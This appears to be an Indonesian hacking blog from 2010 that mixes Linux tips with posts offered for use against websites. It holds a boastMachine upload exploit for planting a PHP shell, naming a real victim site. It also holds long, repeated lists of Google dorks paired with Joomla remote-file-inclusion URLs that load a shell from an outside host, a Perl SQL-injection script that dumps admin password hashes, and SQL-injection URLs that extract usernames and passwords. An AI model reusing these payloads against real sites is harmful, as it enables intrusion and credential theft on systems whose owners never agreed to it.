maap postinganya saya hapus karena sesuatu dan lain hal :)
Read More ...
27 Januari 2010
boastMachine v3.1 Remote File Upload Vulnerability
Author: tRipLeZiX
|
Labels:
hacking
credit : alnjm33
Exploit Code :
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::
Exploit Title : boastMachine v3.1 Remote File Upload Vulnerability
Author: alnjm33
Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
Software Link2:http://boastology.com/pages/dload.php?id=bmachine-3.1.rar
Version: 3.1
Tested on: Version 3.1
My home : Sec-war.com
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::
==========================================Dork=============================
=============
( Powered by
boastMachine v3.1
)
================================Exploit====================================
First join in the Site
/Server/path/register.php
After that
login in the Site
/Server/path/login.php
After Login
go to this link
/Server/path/bmc/files.php?form_id=new
Now upload your shell like ( Shell.php.rar )
Now you can find your shell here
/Server/path/files/username_Shell.php.rar
e.g
http://ldukestudio.com/hp_boastMachine/files/alnjm33_aasaa.php.rar
===========================================================================
Read More ...
Exploit Code :
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::
Exploit Title : boastMachine v3.1 Remote File Upload Vulnerability
Author: alnjm33
Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
Software Link2:http://boastology.com/pages/dload.php?id=bmachine-3.1.rar
Version: 3.1
Tested on: Version 3.1
My home : Sec-war.com
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::
==========================================Dork=============================
=============
( Powered by
boastMachine v3.1
)
================================Exploit====================================
First join in the Site
/Server/path/register.php
After that
login in the Site
/Server/path/login.php
After Login
go to this link
/Server/path/bmc/files.php?form_id=new
Now upload your shell like ( Shell.php.rar )
Now you can find your shell here
/Server/path/files/username_Shell.php.rar
e.g
http://ldukestudio.com/hp_boastMachine/files/alnjm33_aasaa.php.rar
===========================================================================
24 Januari 2010
TuxCut ,Tools Pengganti Netcut pada Linux
Tuxcut agak sedikit berbeda dengan Netcut, di dalam Tuxcut sudah di bundel fitur buat memproteksi kita agar koneksi internet kita tidak bisa dicut atau di potong oleh user lain. Selain itu, ada fitur buat mac scanning dan mac changer-nya juga.. Sebaliknya untuk Netcut, agar kita terproteksi dari user jail yang memakai Netcut, kita harus menginstall program lagi yakni AntiNetcut (meski netcut selalu lebih maju dari anti netcut).
pada postingan ini saya menggunakan fedora core 11 sebagai sistem operasi saya :) .
pada fedora cara penginstalannya sangat mudah tinggal download filenya di
http://bitbucket.org/a_atalla/tuxcut/downloads/TuxCut-3.2-1.i586.rpm
setelah selesai mendownload klik file tersebut.maka otomatis sistem akan segera melakukan penginstalan :D
sedangkan pada kubuntu ada cara lain yang di lakukan
cara ini saya dapatkan di jasakom
1. Download TuxCut, karena kita mau menginstall di kubuntu, kita download debian package di http://bitbucket.org/a_atalla/tuxcut/downloads/TuxCut-3.2_all.deb
2. Sebelum menginstall TuxCut, kita perlu menginstall arp-scan arp-tables dan dsniff (membutuhkan koneksi internet agar kebih mudah dalam proses installnya)
a. Install arp-scan dengan perintah
$ sudo apt-get arp-scan
b. Install dsniff dengan perintah
$ sudo apt-get install dsniff
c. Install arptables, download versi arptables terbaru di http://sourceforge.net/projects/ebtables/files/arptables/
tar zxf arptables-v0.0.3-3.tar.gz
cd arptables-v0.0.3-3
make && make install
3.Install TuxCut dengan perintah
$ sudo dpkg -i TuxCut-3.2_all.deb
*jika masih terdapat error karena library yang masih kurang, bisa dicoba command berikut: apt-get install -f
Untuk mematikan salah satu client, cari ip client yang mau dipotong koneksinya kemudian klik cut. TuxCut bisa digunakan untuk mematikan para NetCut user, tetapi sebaliknya NetCut user tidak bisa meng-cut TuxCut user. Disinilah kelebihan dari TuxCut, biar lebih powerfull lagi, bisa kita kombinasikan dengan membuat rules dengan arp-tables yang kita install tadi. Mungkin lain waktu kita akan bahas sedikit mengenai arp-tables untuk membuat linux kita kebal dari arp poisoning (arp spoofing) untuk lebih jelasnya bisa lihat gambar berikut ini

Sedangkan Untuk melakukan proteksi ARP pada linux kita, yang perlu kita lakukan hanyalah mengaktifkan centang "Protect Me" pada TuxCut. Mudah bukan.

Back Track 4 Final
Tim BackTrack rupanya masih fokus dalam pengembangan sistem operasi yang berorientasi pada sistem keamanan, hal ini di buktikan dengan adanya versi Linux BackTrack 4 Final.
BackTrack 4 Final sekarang ini menawarkan kernel linux terbaru yaitu kernel 2.6.30.4 dilengkapi juga dengan patch untuk wireless driver untuk menanggulangi serangan wireless injection (wireless injection attacks)
BackTrack Adalah sistem operasi linux live DVD yang sangat populer yang khusus menangani kemanan sistem, jaringan, analisan dan diagnosa dari beberapa aplikasi yang ada.
File BackTrack tersedia dalam berbagai macam, antara lain :
1. BackTrack 4 Final PWNSAUCE - ISO
Description: Image Download
Name:: bt4-final.iso
Size: 1570 MB
MD5: af139d2a085978618dc53cabc67b9269
Download BackTrack 4 Final PWNSAUCE - ISO
Download BackTrack 4 Final PWNSAUCE - ISO Torrent
2. BackTrack 4 Final PWNSAUCE - VMware
Description: VM Image Download
Name:: bt4-final-vm.zip
Size: 2000 MB
MD5: 733b47fad1d56d31bc63c16b3706a11c
Download BackTrack 4 Final PWNSAUCE - VM
Download BackTrack 4 Final PWNSAUCE - VM Torrent
Jika berhasil melakukan Donwload BackTrack 4 Final, pastikan untuk selalu mengecek ukuran file dengan menyesuaikan MD5 yang sudah tercantumkan. Anda bisa melakukan pemeriksaan MD5 dengan Nero MD5 Verifier
23 Januari 2010
Joomla Rfi ,Lfi Exploit
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
---------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_extcalendar
CODE:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"minibb\"
CODE:
components/minibb/index.php?absolute_path=http://yourshel.com/666r.txt?
---------------------------------------------------------------------
Google dork:
inurl:\"com_smf\"
CODE:
/components/com_smf/smf.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
CODE:
/modules/mod_calendar.php?absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_pollxt\"
CODE:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_loudmounth\"
CODE:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://shellerz.com/r.txt?
------------------------------------------------------------------------
Google dork:
inurl:\"com_videodb\"
CODE:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_pcchess
CODE:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_multibanners\"
CODE:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_a6mambohelpdesk\"
CODE:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-------------------------------
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
---------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-------------------------------
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
---------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------------------
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
Read More ...
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
---------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_extcalendar
CODE:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"minibb\"
CODE:
components/minibb/index.php?absolute_path=http://yourshel.com/666r.txt?
---------------------------------------------------------------------
Google dork:
inurl:\"com_smf\"
CODE:
/components/com_smf/smf.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
CODE:
/modules/mod_calendar.php?absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_pollxt\"
CODE:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_loudmounth\"
CODE:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://shellerz.com/r.txt?
------------------------------------------------------------------------
Google dork:
inurl:\"com_videodb\"
CODE:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_pcchess
CODE:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_multibanners\"
CODE:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_a6mambohelpdesk\"
CODE:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-------------------------------
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
---------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-------------------------------
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
---------------------------------------------------------------
Google dork:
inurl:\"com_hashcash\"
CODE:
/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------
Google dork:
inurl:\"com_htmlarea3_xtd-c\"
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
------------------------------------------------------------------------------------
Google dork:
inurl:\"com_sitemap\"
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_forum\"
CODE:
/components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
--------------------------------------------------------------------
Google dork:
inurl:\"com_pccookbook\"
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------------------
Google dork:
inurl:\"com_colophon\"
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mgm\"
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
-----------------------------------------------------------------------
Google dork:
inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
Joomla com_bookflip(book_id) Sql injection
Author: tRipLeZiX
|
Labels:
Exploit
#!/usr/bin/perl -w
#Joomla com_bookflip(book_id) Sql injection#
########################################
#[~] Author : psychotic_girl
#[~] Greetz : v3n0m - z0mb13 - All YCL Crew
#---------------------------------------
#[!] BookFlip
#[!] psychotic_girl 2009
#[!] Yogyacarderlink
#[!] psychotic_girl gratuitement.
#[!] psychotic_girl@null.net
#[!] www.yogyacarderlink.web.id
#[!] 2.1
#---------------------------------------
#[!] Google_Dork: inurl:"com_bookflip"
########################################
system("color FF0000");
print "\t ###############################################################\n\n";
print "\t # Yogyacarderlink #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln #\n\n";
print "\t # - Yogyacarderlink #\n\n";
print "\t # - Cod3d by psychotic_girl #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=);
#Column Name
$c_n="concat(username,0x3a,password)";
#Table_name
$t_n="jos_users";
$U="-9999+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Admin Hash Found - by psychotic_girl (v3n0m_GirL) ! # \n\n";
}
else{print "\n[-] Admin Hash Not Found...\n";
}
ekstrak *.rar in Fedora
Bagai mana cara meng ekstrak file dengan ekstensi .rar di fedora?mungkin yang baru memakai OS fedora bingung untuk meng ekstark file tersebut.berikut ada trik untuk mengesktrak file tersebut
pertama buka konsole pada fedora anda,kemudian ketikkan perintah berikut
# yum -y install unrartapi ingat rpmfusionnya sudah harus ter instal,kalau belum terinstal,silahkan masuk ke aplikasi yumex kemudian ketikkan rpmfusion
buka yum extender-> buka form category trus ganti dari none ke rpm group -> trus buka group aplication -> buka archiving nah disana pasti ada aplikasi buat rar extractor.kalo ga da software unrar itu berarti repo nya kurang lengkap
atau bisa juga menggunakan cara berikut
wget -c http://www.rarlab.com/rar/rarlinux-3.6.0.tar.gz
tar zxvf http://www.rarlab.com/rar/rarlinux-3.6.0.tar.gz
cd rar; cp rar unrar /bin
trus kalo mau extract file rar, cukup dengan unrar e
sekian :)
Jomla Sql Injection Exploit
###########################################################################################
(script):com_mailto
(in):index.php?option=com_mailto&tmpl=mailto&artic le=[SQL]
(exploitz):index.php?option=com_mailto&tmpl=mailto &article=550513+and+1=2+union+select+concat(userna me,char(58),password)KHG+from+jos_users--&Itemid=1
(script):com_maianmusic
(in):index.php?option=com_maianmusic§ion=categ ory&category=[SQL]
(exploitz):index.php?option=com_maianmusic§ion =category&category=-1+union+select+1,2,3,concat(username,char(58),pass word)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+jos_users--&Itemid=70
(script):com_bookjoomlas
(in):index.php?option=com_bookjoomlas&Itemid=26&fu nc=comment&gbid=[SQL]
(exploitz):index.php?option=com_bookjoomlas&Itemid =26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,pa ssword),11,12,13,14,15,16 FROM jos_users
(script):com_flashmagazinedeluxe
(in):index.php?option=com_flashmagazinedeluxe&Item id=10&task=magazine&mag_id=[SQL]
(exploitz):index.php?option=com_flashmagazinedelux e&Itemid=10&task=magazine&mag_id=-4 union+select+1,2,3,unhex(hex(version())),5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35/*
(script):com_beamospetition
(in):?option=com_beamospetition&func=sign&mpid=[SQL]
(exploitz):?option=com_beamospetition&func=sign&mp id=-9999'%20union%20select%200,1,username,password,4,5 ,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/*
(script):com_rdautos
(in):index.php?option=com_rdautos&view=category&id =[SQL]
(exploitz):index.php?option=com_rdautos&view=categ ory&id=-1+union+select+concat(username,char(58),password)+ from+jos_users--&Itemid=54
(script):com_newsflash
(in):index.php?option=com_newsflash&id=8 [SQL]
(exploitz):index.php?option=com_newsflash&id=8+and +1=1+union+select+1,username,password,4+from+jos_u sers&catid=0
(script):com_gigcal
(in):index.php?option=com_gigcal&task=details&gigc al_gigs_id=[SQL]
(exploitz):index.php?option=com_gigcal&task=detail s&gigcal_gigs_id=402'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password) ,0,11,12+from+jos_users/*&Itemid=37
(script):com_camelcitydb2
(in):index.php?option=com_camelcitydb2&id=[SQL]
(exploitz):index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),passwo rd)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15
(script):com_catalogproduction
(in):index.php?option=com_catalogproduction&task=v iewdetail&id=[SQL]
(exploitz):index.php?option=com_catalogproduction& task=viewdetail&id=-9999 union all select 1,2,concat(username,char(58),password),null,null,6 ,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_ users
(script):com_n-gallery
(in):index.php?option=com_n-gallery&flokkur=[SQl]
(exploitz):index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)K HG+from+mos_users--
###########################################################################################
Read More ...
(script):com_mailto
(in):index.php?option=com_mailto&tmpl=mailto&artic le=[SQL]
(exploitz):index.php?option=com_mailto&tmpl=mailto &article=550513+and+1=2+union+select+concat(userna me,char(58),password)KHG+from+jos_users--&Itemid=1
(script):com_maianmusic
(in):index.php?option=com_maianmusic§ion=categ ory&category=[SQL]
(exploitz):index.php?option=com_maianmusic§ion =category&category=-1+union+select+1,2,3,concat(username,char(58),pass word)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+jos_users--&Itemid=70
(script):com_bookjoomlas
(in):index.php?option=com_bookjoomlas&Itemid=26&fu nc=comment&gbid=[SQL]
(exploitz):index.php?option=com_bookjoomlas&Itemid =26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,pa ssword),11,12,13,14,15,16 FROM jos_users
(script):com_flashmagazinedeluxe
(in):index.php?option=com_flashmagazinedeluxe&Item id=10&task=magazine&mag_id=[SQL]
(exploitz):index.php?option=com_flashmagazinedelux e&Itemid=10&task=magazine&mag_id=-4 union+select+1,2,3,unhex(hex(version())),5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35/*
(script):com_beamospetition
(in):?option=com_beamospetition&func=sign&mpid=[SQL]
(exploitz):?option=com_beamospetition&func=sign&mp id=-9999'%20union%20select%200,1,username,password,4,5 ,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/*
(script):com_rdautos
(in):index.php?option=com_rdautos&view=category&id =[SQL]
(exploitz):index.php?option=com_rdautos&view=categ ory&id=-1+union+select+concat(username,char(58),password)+ from+jos_users--&Itemid=54
(script):com_newsflash
(in):index.php?option=com_newsflash&id=8 [SQL]
(exploitz):index.php?option=com_newsflash&id=8+and +1=1+union+select+1,username,password,4+from+jos_u sers&catid=0
(script):com_gigcal
(in):index.php?option=com_gigcal&task=details&gigc al_gigs_id=[SQL]
(exploitz):index.php?option=com_gigcal&task=detail s&gigcal_gigs_id=402'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password) ,0,11,12+from+jos_users/*&Itemid=37
(script):com_camelcitydb2
(in):index.php?option=com_camelcitydb2&id=[SQL]
(exploitz):index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),passwo rd)KHG,4,5,6,7,8,9,10,11+from+jos_users--&view=detail&Itemid=15
(script):com_catalogproduction
(in):index.php?option=com_catalogproduction&task=v iewdetail&id=[SQL]
(exploitz):index.php?option=com_catalogproduction& task=viewdetail&id=-9999 union all select 1,2,concat(username,char(58),password),null,null,6 ,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_ users
(script):com_n-gallery
(in):index.php?option=com_n-gallery&flokkur=[SQl]
(exploitz):index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)K HG+from+mos_users--
###########################################################################################
Perintah dasar di Linux
Belajar linux memang tidak mudah,Banyak yang mengatakan klo menggunakan linux itu sangat susah :D .sebenarnya itu tidak susah,mungkin hanya kita belum terbiasa menggunakannya.karena kebanyakan setiap harinya kita hanya menggunakan windows saja.dalam menggunakan linux ada beberapa perintah dasar yang sering di gunakan,berikut perintah-perintah tersebut :)
a) ls , adalah perintah untuk menampilkan isi direktori ada beberapa variasi dari ls yaitu :
ls menampilkan isi direktori
ls -r menampilkan direktori dan isinya
ls -m menampilkan file dengan koma sebagai pembagi
ls -a menampilkan file dan file yang tersembunyi
ls *.txt menampilkan file dengan ekstensi
ls - -colour menampilkan file dan direkstori dengan perbedaan warna.
b) cd digunakan untuk pindah direktori,
cd [tempat yang dituju]
c) find adalah perintah mencari file,
find [direktori] [opsi] [aksi]
d) rm, adalah perintah menghapus file
rm [file yang dihapus]
e) cp, adalah perintah menyalin file dan direktori
cp [file sumber] [file_target/ direktori]
f) mv, adalah perintah mengganti nama file dan memindahkan file
mengganti file mv [filesumber] [file target] dalam satu direktori
memindahkan file mv [file sumber] [direktori target]
g) mkdir, adalah perintah untuk membuat direktori
